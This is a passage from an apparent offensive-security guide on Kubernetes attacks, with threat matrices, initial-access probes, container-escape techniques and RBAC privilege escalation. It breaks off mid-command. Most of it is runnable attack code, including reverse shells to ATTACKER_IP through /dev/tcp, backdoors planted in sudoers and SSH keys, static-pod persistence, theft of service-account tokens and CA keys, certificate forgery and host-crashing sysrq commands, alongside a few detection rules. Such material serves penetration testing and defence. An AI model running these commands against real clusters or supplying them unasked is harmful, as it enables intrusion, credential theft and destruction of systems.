BT
Privacy ToolboxJournalProjectsResumeBookmarks
Feed
Privacy Toolbox
Journal
Projects
Resume
Bookmarks
Intel
CIPHER
Threat Actors
Privacy Threats
Dashboard
CVEs
Tags
Intel
CIPHERThreat ActorsPrivacy ThreatsDashboardCVEsTags

Intel

  • Feed
  • Threat Actors
  • Privacy Threats
  • Dashboard
  • Privacy Toolbox
  • CVEs

Personal

  • Journal
  • Projects

Resources

  • Subscribe
  • Bookmarks
  • Developers
  • Tags
Cybersecurity News & Analysis
github
defconxt
•
© 2026
•
blacktemple.net
  • Overview
  • Web Security
  • API Exploitation
  • Active Directory
  • Windows Internals
  • Linux Exploitation
  • Network Attacks
  • Cloud Attacks
  • Kubernetes Attacks
  • C2 & Post-Exploitation
  • Red Team Infrastructure
  • Evasion Techniques
  • Shells Arsenal
  • Password Attacks
  • Phishing & Social Eng
  • Social Engineering
  • Exfiltration & Tunneling
  • Binary Exploitation
  • Wireless & IoT
  • Blockchain & Web3
  • Malware & Evasion
  • Vulnerability Research
  • Bug Bounty
  • Attack Chains
  • Pentest Cheatsheet
  • Pentest Reporting
  • Overview
  • Web Security
  • API Exploitation
  • Active Directory
  • Windows Internals
  • Linux Exploitation
  • Network Attacks
  • Cloud Attacks
  • Kubernetes Attacks
  • C2 & Post-Exploitation
  • Red Team Infrastructure
  • Evasion Techniques
  • Shells Arsenal
  • Password Attacks
  • Phishing & Social Eng
  • Social Engineering
  • Exfiltration & Tunneling
  • Binary Exploitation
  • Wireless & IoT
  • Blockchain & Web3
  • Malware & Evasion
  • Vulnerability Research
  • Bug Bounty
  • Attack Chains
  • Pentest Cheatsheet
  • Pentest Reporting
  1. CIPHER
  2. /Offensive
  3. /Kubernetes Security Deep Dive — Attacks, Hardening, and Monitoring

Kubernetes Security Deep Dive — Attacks, Hardening, and Monitoring

Kubernetes Security Deep Dive — Attacks, Hardening, and Monitoring

[MODE: PURPLE] — Bridging offense and defense across the entire Kubernetes attack surface.

Last Updated: 2026-03-15 Sources: Kubernetes Goat, kube-bench, kube-hunter, KubeHound, Peirates, CDK, BadPods, kubesec, Popeye, Kubescape, Polaris, Microsoft K8s Threat Matrix, MITRE ATT&CK Containers Matrix, Falco, OPA/Gatekeeper, Kyverno, external-secrets-operator


Table of Contents

  1. Kubernetes Threat Model
  2. Initial Access
  3. Container Escape Techniques
  4. Privilege Escalation
  5. Lateral Movement
  6. Persistence
  7. Credential Access
  8. Data Exfiltration
  9. Defense Evasion
  10. Detection Engineering
  11. Hardening
  12. Offensive and Defensive Tooling
  13. Cloud-Specific Kubernetes Attacks

1. Kubernetes Threat Model

1.1 Attack Surface Overview

┌──────────────────────────────────────────────────────────────────────┐
│                    KUBERNETES ATTACK SURFACE                         │
├──────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  ┌─────────────┐   ┌──────────┐   ┌────────────┐   ┌─────────────┐ │
│  │  API Server  │   │  etcd    │   │  Kubelet   │   │  Container  │ │
│  │  (6443)      │   │  (2379)  │   │  (10250)   │   │  Runtime    │ │
│  │              │   │  (2380)  │   │  (10255)   │   │  (CRI sock) │ │
│  └──────┬───────┘   └────┬─────┘   └─────┬──────┘   └──────┬──────┘ │
│         │                │               │                  │        │
│  ┌──────┴───────┐   ┌────┴─────┐   ┌─────┴──────┐   ┌──────┴──────┐ │
│  │ Scheduler    │   │ CoreDNS  │   │ kube-proxy │   │  Network    │ │
│  │ Ctrl Manager │   │          │   │            │   │  (CNI/svc)  │ │
│  └──────────────┘   └──────────┘   └────────────┘   └─────────────┘ │
│                                                                      │
│  External: Cloud IMDS │ CI/CD │ Registry │ Dashboards │ Ingress     │
└──────────────────────────────────────────────────────────────────────┘

1.2 Component Threat Analysis

Component Port(s) Threats Impact if Compromised
API Server 6443 Anonymous auth, RBAC bypass, audit evasion Full cluster control
etcd 2379, 2380 Unauthenticated access, data dump, secret extraction All cluster state and secrets
Kubelet 10250, 10255 Anonymous exec, pod listing, container log access Node-level code execution
Container Runtime Unix socket Socket escape, image manipulation, container creation Node root access
kube-proxy 10256 CVE-2020-8558 (localhost bypass), traffic manipulation Pod traffic interception
CoreDNS 53 ConfigMap poisoning, DNS rebinding, cache poisoning Service traffic redirection
Cloud IMDS 169.254.169.254 IAM credential theft, metadata enumeration Cloud account compromise
Scheduler 10259 Malicious scheduling, resource exhaustion Workload placement manipulation
Controller Manager 10257 SA key theft, root CA access Cluster-wide impersonation
Admission Controllers Varies Webhook bypass, malicious mutation, TOCTOU Policy enforcement bypass

1.3 Trust Boundaries

┌─────────────────────────────────────────────────────────────────┐
│ INTERNET                                                         │
│  ┌───────────────────────────────────────────────────────────┐   │
│  │ CLOUD VPC                                                  │   │
│  │  ┌─────────────────────────────────────────────────────┐   │   │
│  │  │ KUBERNETES CLUSTER                                   │   │   │
│  │  │  ┌──────────────────────────────────────────────┐    │   │   │
│  │  │  │ NAMESPACE (tenant isolation boundary)         │    │   │   │
│  │  │  │  ┌───────────────────────────────────────┐    │    │   │   │
│  │  │  │  │ POD (network/PID/mount namespace)      │    │    │   │   │
│  │  │  │  │  ┌────────────────────────────────┐    │    │    │   │   │
│  │  │  │  │  │ CONTAINER (cgroup/seccomp/caps) │    │    │    │   │   │
│  │  │  │  │  └────────────────────────────────┘    │    │    │   │   │
│  │  │  │  └───────────────────────────────────────┘    │    │   │   │
│  │  │  └──────────────────────────────────────────────┘    │   │   │
│  │  └─────────────────────────────────────────────────────┘   │   │
│  └───────────────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────────────┘

Trust boundary violations (each is an attack class):
  Internet → VPC:        Exposed services, ingress vulns, SSRF
  VPC → Cluster:         API server exposure, etcd exposure, kubelet exposure
  Cluster → Namespace:   RBAC escalation, NetworkPolicy gaps, SA token theft
  Namespace → Pod:       Pod creation with host access, sidecar injection
  Pod → Container:       Container escape, privilege escalation
  Container → Node:      Privileged breakout, hostPath, runtime CVEs
  Node → Cloud:          IMDS access, node IAM role abuse

1.4 Microsoft Kubernetes Threat Matrix

Tactic Techniques
Initial Access Using cloud credentials, Compromised image in registry, Kubeconfig file, Application vulnerability, Exposed sensitive interfaces
Execution Exec into container, bash/cmd inside container, New container, Application exploit (RCE), SSH server running inside container, Sidecar injection
Persistence Backdoor container, Writable hostPath mount, Kubernetes CronJob, Malicious admission controller, Container service account, Static pods
Privilege Escalation Privileged container, Cluster-admin binding, Writable hostPath mount, Access cloud resources
Defense Evasion Clear container logs, Delete Kubernetes events, Pod/container name similarity, Connect from proxy server
Credential Access List Kubernetes secrets, Mount service principal, Container service account, Application credentials in config files, Access managed identity credentials, Malicious admission controller
Discovery Access Kubernetes API server, Access Kubelet API, Network mapping, Exposed sensitive interfaces, Instance Metadata API
Lateral Movement Access cloud resources, Container service account, Cluster internal networking, Application credentials in config files, Writable hostPath mount, CoreDNS poisoning, ARP poisoning and IP spoofing
Collection Images from a private registry, Collecting data from pod
Impact Data destruction, Resource hijacking, Denial of service

1.5 MITRE ATT&CK Containers Matrix

Tactic Technique ID Technique Name
Initial Access T1190 Exploit Public-Facing Application
T1133 External Remote Services
T1078 Valid Accounts (.001 Default, .003 Local)
Execution T1609 Container Administration Command
T1610 Deploy Container
T1053.007 Container Orchestration Job
T1204.003 Malicious Image
Persistence T1098.006 Additional Container Cluster Roles
T1136.001 Create Local Account
T1543.005 Container Service
T1525 Implant Internal Image
T1053.007 Container Orchestration Job
T1078 Valid Accounts
Privilege Escalation T1098.006 Additional Container Cluster Roles
T1543.005 Container Service
T1611 Escape to Host
T1068 Exploitation for Privilege Escalation
T1053.007 Container Orchestration Job
Defense Evasion T1612 Build Image on Host
T1610 Deploy Container
T1562.001 Disable or Modify Tools
T1070 Indicator Removal
T1036.005 Match Legitimate Resource Name/Location
T1550.001 Application Access Token
Credential Access T1110 Brute Force (.001/.003/.004)
T1528 Steal Application Access Token
T1552.001 Credentials In Files
T1552.007 Container API
Discovery T1613 Container and Resource Discovery
T1046 Network Service Discovery
T1069 Permission Groups Discovery
Lateral Movement T1550.001 Application Access Token
Impact T1485 Data Destruction
T1499 Endpoint Denial of Service
T1496.001 Compute Hijacking
T1496.002 Bandwidth Hijacking

2. Initial Access

2.1 Exposed Kubernetes Dashboard

ATT&CK: T1133 (External Remote Services)

The Kubernetes Dashboard, if exposed without authentication, provides full cluster management via web UI.

# Discovery — Shodan / OSINT
# Shodan dork: "kubernetes dashboard" port:443
# Google dork: inurl:"/api/v1/namespaces/kubernetes-dashboard"

# Direct access test
curl -k https://[TARGET]:443/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/

# Common exposed paths
https://[TARGET]:30000/                          # NodePort default
https://[TARGET]:443/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
https://[TARGET]:8443/                           # Direct dashboard port

Skip Login Exploitation — if --enable-skip-login flag is set:

# Dashboard allows unauthenticated access
# Navigate to the dashboard URL and click "Skip"
# This uses the dashboard's own service account permissions

# Check dashboard service account permissions
kubectl auth can-i --list --as=system:serviceaccount:kubernetes-dashboard:kubernetes-dashboard

Token-based access — if you have any valid token:

# Use a stolen service account token to authenticate
# Paste the token into the dashboard login screen
# The dashboard will operate with that token's permissions

DETECTION OPPORTUNITY: Monitor for external access to dashboard endpoints. Alert on --enable-skip-login in dashboard deployment args.

2.2 Anonymous Kubelet Access

ATT&CK: T1078.001 (Valid Accounts: Default Accounts)

# Kubelet read-only port (10255) — deprecated but often enabled
curl http://[NODE_IP]:10255/pods
curl http://[NODE_IP]:10255/spec
curl http://[NODE_IP]:10255/stats/summary
curl http://[NODE_IP]:10255/metrics

# Kubelet authenticated port (10250) — check for anonymous auth
curl -k https://[NODE_IP]:10250/pods
curl -k https://[NODE_IP]:10250/runningpods/

# If anonymous auth is enabled, execute commands in any pod on the node
curl -k -X POST "https://[NODE_IP]:10250/run/[NAMESPACE]/[POD]/[CONTAINER]" \
  -d "cmd=id"

curl -k -X POST "https://[NODE_IP]:10250/run/kube-system/kube-proxy-xxxxx/kube-proxy" \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

# Read container logs
curl -k "https://[NODE_IP]:10250/containerLogs/kube-system/etcd-master/etcd"

# Mass scan for open kubelets
nmap -sS -p 10250,10255 [CIDR] --open
for ip in $(cat kubelet_hosts.txt); do
  echo "=== $ip ==="
  curl -sk "https://$ip:10250/pods" | head -c 200
done

DETECTION OPPORTUNITY: Alert on kubelet API access from non-API-server IPs. Monitor port 10255 connections.

2.3 Anonymous API Server Access

ATT&CK: T1078.001 (Valid Accounts: Default Accounts)

# API server anonymous auth is enabled by default (--anonymous-auth=true)
# Anonymous user: system:anonymous, group: system:unauthenticated

# Test anonymous access
curl -k https://[API_SERVER]:6443/api
curl -k https://[API_SERVER]:6443/version
curl -k https://[API_SERVER]:6443/api/v1/namespaces
curl -k https://[API_SERVER]:6443/api/v1/pods
curl -k https://[API_SERVER]:6443/apis
curl -k https://[API_SERVER]:6443/healthz

# Check anonymous permissions
kubectl auth can-i --list --as=system:anonymous

# Dangerous: some clusters bind system:unauthenticated to cluster-admin
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.subjects[]? | select(.name == "system:anonymous" or .name == "system:unauthenticated"))'

# Enumerate API resources available anonymously
curl -k https://[API_SERVER]:6443/api/v1 | jq '.resources[].name'

2.4 Misconfigured RBAC

ATT&CK: T1078 (Valid Accounts)

# Overly permissive default service account
kubectl auth can-i --list --as=system:serviceaccount:default:default

# Common misconfigurations to check
kubectl get clusterrolebindings -o json | jq '
  .items[] | select(
    .roleRef.name == "cluster-admin" and
    (.subjects[]? | .kind == "ServiceAccount")
  ) | {name: .metadata.name, subjects: .subjects}'

# Wildcard permissions (anything goes)
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? | .verbs[]? == "*") |
  {name: .metadata.name, rules: .rules}'

# Service accounts with secret access
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? |
    (.resources[]? == "secrets") and
    ((.verbs[]? == "get") or (.verbs[]? == "list") or (.verbs[]? == "*"))
  ) | {name: .metadata.name}'

2.5 CI/CD Pipeline Compromise

ATT&CK: T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain)

# Common CI/CD → K8s attack vectors:

# 1. Stolen kubeconfig from CI runner
# GitHub Actions: secrets.KUBECONFIG or ~/.kube/config
# GitLab CI: KUBECONFIG variable or mounted file
# Jenkins: Kubernetes plugin credentials

# 2. CI runner service account is overprivileged
# Verify from compromised runner:
kubectl auth can-i --list
kubectl auth can-i create clusterrolebindings
kubectl get secrets -A

# 3. Image tag manipulation (supply chain)
# Push backdoored image with same tag
docker build -t registry.example.com/app:latest -f Dockerfile.backdoor .
docker push registry.example.com/app:latest
# Pods with imagePullPolicy: Always will pull the backdoor on restart

# 4. Helm chart poisoning
# Modify chart values to inject:
# - initContainers with host filesystem access
# - sidecar containers for credential theft
# - modified securityContext for privilege escalation

# 5. GitOps repository compromise (ArgoCD / Flux)
# Modify Git repo → ArgoCD auto-syncs malicious manifests
# Add privileged pods, modify RBAC, inject CronJobs

# ArgoCD default password is often the server pod name
kubectl -n argocd get secret argocd-initial-admin-secret \
  -o jsonpath='{.data.password}' | base64 -d

# Check for exposed ArgoCD API
curl -k https://[ARGOCD_SERVER]/api/v1/applications

2.6 Exposed Sensitive Interfaces

ATT&CK: T1133 (External Remote Services)

# Commonly exposed management interfaces
# etcd
curl http://[IP]:2379/version
curl http://[IP]:2379/v2/keys/?recursive=true

# cAdvisor (container metrics — may leak environment variables)
curl http://[NODE_IP]:4194/containers/

# Kubernetes API via kubectl proxy (if left running)
curl http://[NODE_IP]:8001/api/v1/namespaces/kube-system/secrets

# Prometheus / Grafana (metrics may reveal secrets, architecture)
curl http://[IP]:9090/api/v1/targets
curl http://[IP]:3000/api/dashboards/home

# Weave Scope (full cluster topology + exec into containers)
curl http://[IP]:4040/api/topology

# Jaeger (tracing — may contain sensitive request data)
curl http://[IP]:16686/api/traces

# Scan for common K8s management ports
nmap -sS -p 2379,2380,4194,6443,8001,8080,8443,9090,10250,10255,10256,16686,30000-32767 [TARGET]

2.7 Application Vulnerability (SSRF to Internal Services)

ATT&CK: T1190 (Exploit Public-Facing Application)

# SSRF from a web application into Kubernetes internal services

# Target the API server from within the cluster
curl https://kubernetes.default.svc:443/api/v1/namespaces/kube-system/secrets \
  -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
  -k

# Target cloud metadata
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Target kubelet API
curl -k https://[NODE_IP]:10250/runningpods/

# Target etcd
curl http://[ETCD_IP]:2379/v2/keys/?recursive=true

# Target internal services via DNS
# service.namespace.svc.cluster.local
curl http://[SERVICE].default.svc.cluster.local/

3. Container Escape Techniques

3.1 Privileged Container Escapes

3.1.1 Cgroup Release Agent Escape (cgroup v1)

Prerequisite: privileged: true, cgroup v1 ATT&CK: T1611 (Escape to Host)

# Compact one-liner
d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
touch /o; echo $t/c > $d/release_agent
printf '#!/bin/sh\n%s >%s/o' "$1" "$t" > /c
chmod +x /c; sh -c "echo 0 >$d/w/cgroup.procs"; sleep 1; cat /o

# Expanded version with reverse shell
cat > /escape.sh << 'ESCAPE'
#!/bin/bash
overlay=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
cgroup_dir=$(dirname $(ls -x /sys/fs/cgroup/*/release_agent 2>/dev/null | head -n1))
mkdir -p "$cgroup_dir/pwn"
echo 1 > "$cgroup_dir/pwn/notify_on_release"
echo "$overlay/cmd.sh" > "$cgroup_dir/release_agent"

cat > /cmd.sh << 'CMD'
#!/bin/sh
/bin/bash -c "/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
CMD
chmod +x /cmd.sh

# Trigger: create and immediately kill a process in the cgroup
sh -c "echo \$\$ > $cgroup_dir/pwn/cgroup.procs"
ESCAPE
chmod +x /escape.sh

How it works: When all processes in a cgroup exit and notify_on_release is set to 1, the kernel executes the binary specified in release_agent as root on the host. Since privileged containers can write to /sys/fs/cgroup, the attacker sets release_agent to a script on the host filesystem (accessible via the overlay mount) and triggers execution.

Detection -- Falco Rule:

- rule: Cgroup Release Agent File Modification
  desc: Detect writes to cgroup release_agent indicating container escape
  condition: >
    open_write and
    fd.name endswith "release_agent" and
    container.id != ""
  output: >
    Cgroup release_agent modified in container
    (user=%user.name command=%proc.cmdline file=%fd.name container=%container.name image=%container.image.repository)
  priority: CRITICAL
  tags: [container, escape, T1611]

3.1.2 nsenter Escape

Prerequisite: privileged: true + hostPID: true

# Enter all namespaces of PID 1 (host init process)
nsenter -t 1 -m -u -n -i sh
# -t 1  : target PID 1 (init)
# -m    : mount namespace
# -u    : UTS namespace (hostname)
# -n    : network namespace
# -i    : IPC namespace

# Full host root shell. Now harvest credentials:
find /var/lib/kubelet/pods/ -name token -type l 2>/dev/null | while read t; do
  echo "=== $t ==="
  cat "$t" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -c \
    "import sys,json; d=json.load(sys.stdin); print(d.get('sub','?'))" 2>/dev/null
done

# Grab kubeconfig
cat /etc/kubernetes/admin.conf 2>/dev/null
cat /root/.kube/config 2>/dev/null

3.1.3 Device Mount Escape

Prerequisite: privileged: true

# List host block devices (privileged grants access to /dev)
fdisk -l
lsblk

# Mount the host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host   # or /dev/nvme0n1p1, /dev/vda1, etc.

# Full read/write access to host filesystem
cat /mnt/host/etc/shadow
echo "attacker ALL=(ALL) NOPASSWD:ALL" >> /mnt/host/etc/sudoers

# Plant SSH backdoor
mkdir -p /mnt/host/root/.ssh
echo "ssh-ed25519 AAAA... attacker@host" >> /mnt/host/root/.ssh/authorized_keys

# Chroot for full host environment
chroot /mnt/host /bin/bash

3.1.4 Docker Socket Escape

Prerequisite: Docker socket mounted at /var/run/docker.sock

# Verify socket access
ls -la /var/run/docker.sock

# List all containers on the host
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | jq '.[].Names'

# Create a privileged container with host filesystem mounted
curl -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "ubuntu:latest",
    "Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"],
    "HostConfig": {
      "Privileged": true,
      "PidMode": "host",
      "NetworkMode": "host",
      "Binds": ["/:/hostroot"]
    }
  }' \
  http://localhost/containers/create

# Start the container
curl -s --unix-socket /var/run/docker.sock -X POST \
  http://localhost/containers/[CONTAINER_ID]/start

# Or with docker CLI if available
docker -H unix:///var/run/docker.sock run -it --privileged \
  --pid=host --net=host -v /:/hostroot ubuntu chroot /hostroot bash

3.1.5 Core Pattern Escape

Prerequisite: privileged: true or CAP_SYS_ADMIN

# /proc/sys/kernel/core_pattern controls what runs when a process dumps core
# If it starts with |, the kernel pipes the core dump to that program
overlay=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo '#!/bin/bash' > /payload.sh
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /payload.sh
chmod +x /payload.sh

# Set core_pattern to execute our payload
echo "|$overlay/payload.sh" > /proc/sys/kernel/core_pattern

# Trigger a core dump
sleep 10 &
kill -SIGSEGV $!

3.1.6 /proc/sysrq-trigger Abuse

Prerequisite: privileged: true or write access to /proc/sysrq-trigger

# SysRq allows direct kernel commands -- mostly DoS in container context
echo c > /proc/sysrq-trigger   # Crash the host (kernel panic)
echo b > /proc/sysrq-trigger   # Force immediate reboot
echo i > /proc/sysrq-trigger   # Kill all processes except init

# Reboots may cause pods to restart with weaker security if
# admission controllers are down during node recovery

3.2 hostPath Mount Escapes

ATT&CK: T1552.001 (Credentials in Files), T1006 (Direct Volume Access)

apiVersion: v1
kind: Pod
metadata:
  name: hostpath-escape
spec:
  containers:
  - name: pwn
    image: ubuntu
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /host
      name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /
kubectl apply -f hostpath-escape.yaml
kubectl exec -it hostpath-escape -- bash

# Full host filesystem at /host
strings /host/var/lib/etcd/member/snap/db | grep eyJhbGciOiJ
find /host/var/lib/kubelet/pods -name token -type l -exec cat {} \;
cat /host/var/lib/kubelet/config.yaml

# Plant static pod (bypasses all admission controllers)
cat > /host/etc/kubernetes/manifests/backdoor.yaml << 'MANIFEST'
apiVersion: v1
kind: Pod
metadata:
  name: static-backdoor
  namespace: kube-system
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: backdoor
    image: ubuntu
    command: ["bash", "-c", "while true; do sleep 3600; done"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: root
  volumes:
  - name: root
    hostPath:
      path: /
MANIFEST

3.3 CVE-Based Container Escapes

3.3.1 CVE-2019-5736 -- runc Host Binary Overwrite

CVSS: 8.6 | Component: runc < 1.0-rc6

# When a container process accesses /proc/self/exe, it points to the
# runc binary on the host. By replacing the container entrypoint with
# a symlink to /proc/self/exe, the next exec overwrites host runc.

# 1. Replace container binary with symlink
cp /bin/bash /bin/bash.bak
ln -sf /proc/self/exe /bin/bash

# 2. Prepare overwrite payload
cat > /overwrite.sh << 'EOF'
#!/bin/bash
while true; do
  if [ -f /proc/self/exe ]; then
    echo '#!/bin/bash' > /proc/self/exe
    echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /proc/self/exe
    break
  fi
  sleep 0.1
done
EOF

# 3. Next docker exec triggers overwrite and executes attacker payload as host root
# PoC tool: github.com/Frichetten/CVE-2019-5736-PoC

Mitigation: Update runc >= 1.0-rc6. Use read-only /proc. Use rootless containers.

3.3.2 CVE-2020-15257 -- containerd Shim API Exposure

CVSS: 5.2 | Component: containerd < 1.3.9, < 1.4.3

# containerd-shim API exposed on abstract unix socket
# accessible from containers with host network namespace (hostNetwork: true)
cat /proc/net/unix | grep containerd-shim

# Exploit via CDK
cdk run shim-pwn

3.3.3 CVE-2022-0185 -- Heap Overflow in Legacy Filesystem Context

CVSS: 8.4 | Component: Linux kernel < 5.16.2

# Heap buffer overflow in fs_context via legacy_parse_param()
# Allows container escape from unprivileged user namespace

# Check if exploitable
cat /proc/sys/kernel/unprivileged_userns_clone   # Should be 1
uname -r                                          # Kernel 5.1 to 5.16.1

# Exploit abuses heap overflow to gain arbitrary write,
# overwrites cred struct to get root, escapes via setns to host
# PoC: github.com/Crusaders-of-Rust/CVE-2022-0185

Mitigation: Patch kernel. Set kernel.unprivileged_userns_clone=0. Seccomp block unshare.

3.3.4 CVE-2024-21626 -- runc Working Directory Breakout (Leaky Vessels)

CVSS: 8.6 | Component: runc < 1.1.12

# runc leaks an internal file descriptor to the host filesystem
# into the container process via /proc/self/fd/[N]

# Attack via Dockerfile:
# FROM ubuntu
# WORKDIR /proc/self/fd/7    <- fd 7 points to host / in vulnerable runc

# Attack via exec:
docker exec --workdir /proc/self/fd/7 container_name ls /
# Lists host root filesystem

# Buildkit attack during image build:
# FROM ubuntu
# RUN --mount=type=cache,target=/proc/self/fd/7 cat /etc/shadow

Mitigation: Update runc >= 1.1.12, Docker >= 25.0.1, containerd >= 1.6.28.

3.3.5 CVE-2022-0492 -- Cgroup Escape via User Namespaces

CVSS: 7.0 | Component: Linux kernel cgroups

# Unprivileged cgroup escape when user namespaces enabled + cgroup v1 + no LSM
unshare -Urm sh -c 'mkdir /tmp/cg && mount -t cgroup -o rdma cgroup /tmp/cg && echo VULNERABLE'

# Uses same release_agent technique but without requiring privileged: true

3.4 Ptrace-Based Escape

Prerequisite: CAP_SYS_PTRACE + hostPID: true

ps auxww | grep -v grep | grep root
gdb -p [HOST_ROOT_PID]
(gdb) call (int)system("bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'")
(gdb) detach
(gdb) quit

3.5 Escape Summary Matrix

Technique Required Privileges Cgroup Kernel Patch? Result
Cgroup release_agent privileged v1 No Host code exec
nsenter privileged + hostPID Any No Full host shell
Device mount privileged Any No Host filesystem
Docker socket Socket mount Any No New container
Core pattern privileged/CAP_SYS_ADMIN Any No Host code exec
CVE-2019-5736 Any (on exec) Any Yes (runc) Host binary overwrite
CVE-2022-0185 User namespace Any Yes (kernel) Heap overflow to root
CVE-2024-21626 Any (build/exec) Any Yes (runc) FD leak to host fs
CVE-2022-0492 User namespace v1 Yes (kernel) Unpriv cgroup escape
Ptrace inject CAP_SYS_PTRACE+hostPID Any No Process injection

4. Privilege Escalation

4.1 RBAC Abuse -- Create Pods

ATT&CK: T1098.006 (Additional Container Cluster Roles)

If an identity can create pods, it can escalate to any service account in the same namespace.

# Check if current identity can create pods
kubectl auth can-i create pods

# Create a pod with a high-privilege service account
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: escalate-via-pod
  namespace: kube-system
spec:
  serviceAccountName: clusterrole-aggregation-controller
  automountServiceAccountToken: true
  containers:
  - name: pwn
    image: ubuntu
    command: ["sleep", "infinity"]
EOF

# Access the mounted token
kubectl exec -it escalate-via-pod -n kube-system -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Use the stolen token
TOKEN=$(kubectl exec escalate-via-pod -n kube-system -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token)
kubectl --token=$TOKEN auth can-i --list

4.2 RBAC Abuse -- Bind Roles

# If you can create RoleBindings/ClusterRoleBindings:
kubectl auth can-i create clusterrolebindings

# Bind cluster-admin to your service account
kubectl create clusterrolebinding pwned \
  --clusterrole=cluster-admin \
  --serviceaccount=default:default

# Bind to a user
kubectl create clusterrolebinding pwned-user \
  --clusterrole=cluster-admin \
  --user=attacker@example.com

# Bind to a group
kubectl create clusterrolebinding pwned-group \
  --clusterrole=cluster-admin \
  --group=system:authenticated

Note: Kubernetes 1.25+ has the escalate verb check -- you cannot bind a role with more permissions than you currently have UNLESS you also have the escalate verb on roles/clusterroles.

4.3 RBAC Abuse -- Escalate Verb

# The 'escalate' verb allows creating roles with ANY permissions
kubectl auth can-i escalate clusterroles

# If permitted, create a god-mode role
cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: god-mode
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
- nonResourceURLs: ["*"]
  verbs: ["*"]
EOF

# Bind it to yourself
kubectl create clusterrolebinding god-binding \
  --clusterrole=god-mode \
  --serviceaccount=default:default

4.4 RBAC Abuse -- Impersonate

# Check for impersonation permissions
kubectl auth can-i impersonate users
kubectl auth can-i impersonate groups
kubectl auth can-i impersonate serviceaccounts

# Impersonate cluster-admin
kubectl auth can-i --list --as=system:admin
kubectl get secrets -A --as=cluster-admin

# Impersonate any service account
kubectl get secrets -A \
  --as=system:serviceaccount:kube-system:clusterrole-aggregation-controller

# Impersonate a group
kubectl get nodes --as=developer --as-group=system:masters

4.5 RBAC Abuse -- Token Request (create serviceaccounts/token)

# If you can create tokens for service accounts:
kubectl auth can-i create serviceaccounts/token

# Generate a token for any SA in the namespace
kubectl create token cluster-admin-sa -n kube-system --duration=87600h

# Use the TokenRequest API directly
curl -k -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  "https://kubernetes.default.svc/api/v1/namespaces/kube-system/serviceaccounts/default/token" \
  -d '{"apiVersion":"authentication.k8s.io/v1","kind":"TokenRequest","spec":{"expirationSeconds":315360000}}'

4.6 RBAC Abuse -- CSR Signing (Certificates)

# If you can create/approve CertificateSigningRequests:
kubectl auth can-i create certificatesigningrequests
kubectl auth can-i update certificatesigningrequests/approval

# Generate a key and CSR for a privileged identity
openssl genrsa -out attacker.key 2048
openssl req -new -key attacker.key -out attacker.csr \
  -subj "/O=system:masters/CN=attacker"  # system:masters group = cluster-admin

# Submit CSR to Kubernetes
cat <<EOF | kubectl apply -f -
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: attacker-csr
spec:
  request: $(cat attacker.csr | base64 | tr -d '\n')
  signerName: kubernetes.io/kube-apiserver-client
  usages:
  - client auth
EOF

# Approve the CSR (if you have approval permissions)
kubectl certificate approve attacker-csr

# Extract the signed certificate
kubectl get csr attacker-csr -o jsonpath='{.status.certificate}' | base64 -d > attacker.crt

# Use the certificate for cluster-admin access
kubectl --client-certificate=attacker.crt --client-key=attacker.key \
  --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
  --server=https://kubernetes.default.svc auth can-i --list

4.7 Node-to-Cluster Pivoting

# Once you have root on a node, escalate to cluster-admin:

# 1. Steal kubelet client certificate (authenticates as system:node:NODE_NAME)
cat /var/lib/kubelet/pki/kubelet-client-current.pem

# 2. On control-plane nodes: steal admin kubeconfig
cat /etc/kubernetes/admin.conf

# 3. On control-plane nodes: steal CA key for certificate forgery
cat /etc/kubernetes/pki/ca.key
cat /etc/kubernetes/pki/ca.crt

# Forge any certificate with the CA key:
openssl genrsa -out forged.key 2048
openssl req -new -key forged.key -out forged.csr -subj "/O=system:masters/CN=forged-admin"
openssl x509 -req -in forged.csr -CA /etc/kubernetes/pki/ca.crt \
  -CAkey /etc/kubernetes/pki/ca.key -CAcreateserial \
  -out forged.crt -days 365

# 4. Extract etcd credentials for direct etcd access
cat /etc/kubernetes/pki/etcd/peer.crt
cat /etc/kubernetes/pki/etcd/peer.key

# 5. Harvest all SA tokens from kubelet pod volumes
find /var/lib/kubelet/pods/ -name token -type l | while read f; do
  echo "=== $f ==="
